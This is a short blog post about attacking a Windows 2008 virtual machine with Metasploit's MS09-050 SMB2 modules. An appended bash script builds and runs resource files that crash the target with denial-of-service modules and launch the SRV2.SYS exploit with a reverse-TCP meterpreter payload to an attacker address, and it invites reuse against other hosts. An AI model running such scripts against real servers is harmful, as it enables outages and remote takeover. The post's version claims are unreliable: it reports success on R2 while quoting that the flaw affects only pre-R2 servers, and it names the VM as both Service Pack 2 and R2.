03/15/11 Metasploit attack on Windows 2008 R2 Server

While reading an article on Attacking an Unpatched Windows 2008 Server, I wanted to try the exploit on a VM of Windows 2008 Service Pack 2 NL (Netherlands). The two exploits described in the article, ms_09_050_smb2_negotiate_pidhigh and ms_09_050_smb2_session_logoff, are meant to cause the OS to Blue Screen. I tried this with the Netherlands version of Microsoft 2008 R2 and had no luck getting the OS to Blue Screen.

So I decided to try other similar exploits, such as Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference, and I got lucky. This module exploits an out-of-bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.

What is interesting is that this exploit was used against Windows 2008 Server R2 (Netherlands) and I was able to gain a meterpreter session.
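As an added example (not code from the original post), the script below writes two Metasploit resource files that drive the modules named above: one for the two MS09-050 denial-of-service modules, and a separate one for the SMB2 negotiate function-table-dereference exploit with a reverse-TCP meterpreter payload. They are kept separate on purpose: the DoS modules blue-screen the target, so a host that has just crashed will not serve the exploit. The target and listener addresses (192.0.2.10 and 192.0.2.1), the output file names and the payload choice are assumptions for a lab and not taken from the post; the module paths are the current Metasploit names for the modules the post refers to.

```shell
#!/usr/bin/env bash
# Added example: generate Metasploit resource files for the MS09-050 SMB2 modules.
# Nothing here is from the original post; addresses and file names are assumed lab values.
set -eu

RHOST="${RHOST:-192.0.2.10}"   # assumed lab target (the Windows 2008 VM)
LHOST="${LHOST:-192.0.2.1}"    # assumed attacker address for the reverse handler

# Resource file for the two DoS modules. Run this one on its own: a successful run
# blue-screens the target, so nothing else in the same session will reach it.
write_dos_rc() {
  local out="$1"
  cat > "$out" <<EOF
use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
set RHOST $RHOST
run
use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
set RHOST $RHOST
run
EOF
}

# Resource file for the code-execution module. The payload is what turns a successful
# trigger into the meterpreter session the post describes; LHOST must be reachable
# from the target for the reverse connection to come back.
write_exploit_rc() {
  local out="$1"
  cat > "$out" <<EOF
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOST $RHOST
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $LHOST
exploit -j
EOF
}

# Count the modules a resource file selects; useful as a sanity check before running it.
rc_module_count() {
  grep -c '^use ' "$1"
}

# Usage: ./ms09_050.sh --run dos|exploit   (requires msfconsole on PATH)
if [ "${1:-}" = "--run" ]; then
  case "${2:-}" in
    dos)     write_dos_rc ms09_050_dos.rc;         msfconsole -q -r ms09_050_dos.rc ;;
    exploit) write_exploit_rc ms09_050_exploit.rc; msfconsole -q -r ms09_050_exploit.rc ;;
    *)       echo "usage: $0 --run dos|exploit" >&2; exit 2 ;;
  esac
fi
```

Because RHOST and LHOST are read from the environment, the same script works against another lab box with `RHOST=... LHOST=... ./ms09_050.sh --run exploit`. If the DoS run does not crash the target, as the post reports for the R2 build, the exploit run is the next thing to try; if it does crash it, wait for the VM to come back before running the exploit file.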